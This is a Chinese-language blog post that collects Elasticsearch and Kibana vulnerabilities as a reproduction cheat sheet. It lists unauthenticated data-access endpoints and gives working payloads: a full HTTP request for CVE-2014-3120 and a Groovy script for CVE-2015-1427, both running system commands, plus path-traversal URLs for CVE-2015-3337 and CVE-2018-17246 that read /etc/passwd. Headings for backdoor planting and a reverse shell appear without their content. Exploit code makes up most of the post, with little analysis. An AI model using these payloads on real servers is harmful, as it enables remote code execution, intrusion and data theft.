应用安全 - 工具|平台 - Elasticsearch- 漏洞 - 汇总

未授权访问

(1)
/_cat/indices #Index个数查询

(2)
/_mapping?pretty=true #type个数查询

(3)
根据Index和type查询表数据

 

 



(4)
/_river/_search #查看数据库敏感信息
检测脚本已同步至Github

(3)
/_nodes #查看节点数据

(4)
/_plugin/head/ #web管理界面

 

 

CVE-2014-3120

Date
2014

类型
远程代码执行漏洞

影响范围
ElasticSearch 1.2及其之前的版本

前置条件
若没有数据需要先创建一条任意数据


 复现

POC|EXP

POST /_search?pretty HTTP/1.1
Host: xx.xx.15.130:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

 

 

CVE-2015-1427

Date
2015

类型
ElasticSearch Groovy脚本远程代码执行漏洞

影响范围
Elasticsearch versions 1.3.0-1.3.7 and 1.4.0-1.4.2

前置条件
若没有数据需要先创建一条任意数据


复现
POC|EXP
(1)命令执行

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

(2)种植后门getshell

分析
通过MVEL构造或Grovvy执行任意java代码

 

CVE-2015-3337

Date
2015

类型
任意文件读取漏洞

影响范围
v<1.5.2 and v<1.4.5


复现
Windows
脚本已同步至GitHub
Linux
http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd

分析
site插件影响

 

CVE-2018-17246

Date
2018

类型

本地文件包含漏洞导致拒绝服务、任意文件读取、反弹shell


影响范围
Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本 复现 POX|EXP
(1)DDOS
(2)任意文件读取
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

 

 (3)反弹shell


分析
posted @ 2019-12-18 16:26  7hang  阅读(1470)  评论(0编辑  收藏  举报